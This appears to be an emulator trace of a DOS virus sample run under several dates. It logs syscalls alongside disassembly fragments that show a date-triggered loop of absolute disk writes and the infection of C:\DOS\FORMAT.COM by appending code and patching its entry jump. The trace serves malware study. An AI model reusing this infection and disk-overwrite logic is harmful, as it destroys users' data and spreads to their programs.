2018-12-25T11:58:59.794807633Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.796961675Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.798662716Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.80098786Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.803943346Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.806068066Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.808088335Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.811236546Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.813522293Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.815798991Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.818476217Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.822626372Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.825529462Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.828453453Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.830618685Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.832890799Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.837259803Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.839383317Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.841426418Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.844156419Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.848506374Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.851210567Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.854429519Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.856928667Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.859462172Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.863064726Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.86642214Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.86991146Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.873050647Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.87538421Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.877696447Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.880704432Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.883082318Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.885412734Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.888868394Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.891190523Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.893531666Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.896844231Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.898928139Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.900876779Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.903925325Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.905848947Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.907774574Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.910620638Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.912564278Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.914488759Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.917232631Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.919209215Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.921219549Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.925357689Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.936366353Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.939317415Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.943154429Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.945328281Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.94742102Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.949988926Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.952347342Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.95450382Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.957618178Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.959651583Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.96201721Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.965268572Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.968891824Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.97264713Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T11:58:59.98076024Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T11:58:59.983392685Z 62 PC: 12a69 | Close file (See above)
2018-12-25T11:58:59.985967288Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.989717902Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.992142363Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.994588971Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.998477209Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.000763718Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.003125361Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.020759878Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.02879969Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.031260973Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.035553555Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.037983489Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.040387286Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.043887675Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.053883965Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.056325Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.059485136Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.062297779Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.064663258Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.06775489Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.070347721Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.072678129Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.076174572Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.078649774Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.080988037Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.084256094Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.086903393Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.089204874Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.092337737Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.094968623Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.097277444Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.100432507Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.102932892Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.109028696Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.113532153Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.116071292Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T11:59:00.121661275Z 76 PC: 12a69 | Terminate with return code (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:02.640078019Z 255 PC: 13036 | UNKNOWN!
2018-12-25T13:07:02.641608056Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T13:07:02.644130914Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-25T13:07:02.646995888Z 47 PC: 130ac | Get disk transfer address
2018-12-25T13:07:02.649724675Z 26 PC: 130bf | Set disk transfer address
2018-12-25T13:07:02.651025244Z 78 PC: 1314a | Find first file
2018-12-25T13:07:02.657224799Z 79 PC: 13150 | Find next file
2018-12-25T13:07:02.661585773Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.66438719Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.667146578Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.672952833Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.675701195Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.679013454Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.682817296Z 78 PC: 1314a | Find first file (See above)
2018-12-25T13:07:02.691927862Z 79 PC: 13150 | Find next file (See above)
2018-12-25T13:07:02.695205913Z 67 PC: 13189 | Get or set file attributes
2018-12-25T13:07:02.701341545Z 67 PC: 1319b | Get or set file attributes
2018-12-25T13:07:04.605739281Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T13:07:04.613181325Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T13:07:04.615071387Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T13:07:04.618341739Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T13:07:04.623849926Z 66 PC: 131dd | Move file pointer
2018-12-25T13:07:04.625213641Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T13:07:04.840624811Z 66 PC: 13214 | Move file pointer
2018-12-25T13:07:04.842443467Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T13:07:04.845755486Z 87 PC: 13236 | Get or set file date and time
2018-12-25T13:07:04.849641209Z 62 PC: 1323a | Close file
2018-12-25T13:07:05.062477846Z 67 PC: 13249 | Get or set file attributes
2018-12-25T13:07:05.189462417Z 26 PC: 13256 | Set disk transfer address
2018-12-25T13:07:05.192111583Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T13:07:05.194264508Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.197733Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.201355049Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.203514609Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.205590996Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.208482115Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.210664513Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.213182767Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.216232843Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.218602118Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.221829171Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.226037694Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.228415211Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.230871874Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.235305467Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.237556488Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.239910701Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.244006181Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.24695534Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.249109837Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.254659851Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.258853935Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.260795332Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.263046791Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.265105254Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.267022012Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.269297595Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.271242845Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.273138704Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.275700344Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.277714481Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.279596421Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.281552328Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.284009595Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.285891355Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.287709853Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.289937377Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.293006321Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.295390655Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.298116854Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.301646531Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.303922981Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.306355585Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.308283645Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.31020956Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.312656095Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.31459826Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.316541002Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.31886783Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.320321137Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.321693192Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.323966121Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.325467283Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.326889141Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.328721346Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.330307307Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.331741094Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.333573884Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.335549503Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.337478552Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.339889983Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.342559803Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.344602287Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.347156626Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.349043618Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.350976638Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.353135319Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.354952855Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.356774097Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.358816884Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.360745084Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.362525799Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.364564574Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.366430486Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.368489174Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.37082982Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.372698173Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.373990621Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.37669079Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.378146453Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.379472083Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.38120187Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.382559676Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.38422494Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.38676027Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.388667976Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.39063281Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.392709956Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.394488938Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.396255979Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.399147671Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.400914847Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.402672327Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.40473811Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.407381755Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.409553223Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.41192614Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.415179487Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.417160747Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.419260957Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.421174073Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.422927067Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.425022758Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.426867976Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.428854152Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.430847707Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.432732638Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.434624982Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.436580438Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.438334555Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.44018267Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.443172984Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.4450843Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.446973427Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.448922709Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.450725505Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.453063633Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.455531267Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.457964727Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.459996749Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.462338962Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.465419072Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.467490141Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.470800088Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.47285374Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.47475488Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.480185538Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.482087314Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.483856427Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.486477698Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.488392622Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.4903135Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.493044458Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.495353361Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.497435243Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.501118442Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.503025501Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.505171137Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.514621542Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.516629932Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.518599878Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.520575193Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.522357083Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.533207847Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.535319886Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.53745944Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.539836527Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.542062043Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.545537848Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.54961893Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T13:07:05.558050671Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T13:07:05.560507585Z 62 PC: 12a69 | Close file (See above)
2018-12-25T13:07:05.562836948Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.564785031Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.56667257Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.569095824Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.570973913Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.572837765Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.575318136Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.577435781Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.579204332Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.582214436Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.584454046Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.586328206Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.588317398Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.590173838Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.592183547Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.594263153Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.596126423Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.598231121Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.600154612Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.60199276Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.604281929Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.60622819Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.608295713Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.610861973Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.612721358Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.614750741Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.617172385Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.619069276Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.620930196Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.624647911Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.626551281Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.628426272Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.631112622Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.634584433Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.638182319Z 2 PC: 12bae | Character output (See above)
2018-12-25T13:07:05.640557034Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T13:07:05.648239331Z 76 PC: 12a69 | Terminate with return code (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:58.524017074Z 255 PC: 13036 | UNKNOWN!
2018-12-25T11:58:58.528018606Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T11:58:58.530563868Z 43 PC: 1306e | Set date
2018-12-25T11:58:58.534205739Z 45 PC: 13074 | Set time
2018-12-25T11:58:58.537947931Z 44 PC: 13078 | Get time 0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
0x1307d: jmp 0x1304d
0x1307f: mov ah, 9
0x13081: mov dx, si
0x13083: add dx, 0x40
0x13087: int 0x21
0x13089: cmp byte ptr [si], 0x1a
0x1308e: ja 0x130a7
0x13090: pushf
0x13091: mov al, byte ptr [si]
0x13095: mov cx, 0x100
0x13098: mov dx, 0
0x1309b: mov bx, 1
0x1309e: int 0x26
0x130a0: popf
0x130a1: inc byte ptr [si]
0x130a5: jmp 0x13089
0x130a7: push es
0x130a8: mov ah, 0x2f
2018-12-25T11:58:58.5419999Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-25T11:58:58.544918838Z 47 PC: 130ac | Get disk transfer address
2018-12-25T11:58:58.546721392Z 26 PC: 130bf | Set disk transfer address
2018-12-25T11:58:58.554821682Z 78 PC: 1314a | Find first file
2018-12-25T11:58:58.566684108Z 79 PC: 13150 | Find next file
2018-12-25T11:58:58.569826607Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.574088952Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.578133281Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.581379223Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.585648561Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.588675734Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.591677568Z 78 PC: 1314a | Find first file (See above)
2018-12-25T11:58:58.602502165Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.613114144Z 67 PC: 13189 | Get or set file attributes
2018-12-25T11:58:58.62460121Z 67 PC: 1319b | Get or set file attributes
2018-12-25T11:58:58.972337324Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:58:58.981588103Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T11:58:58.983566435Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
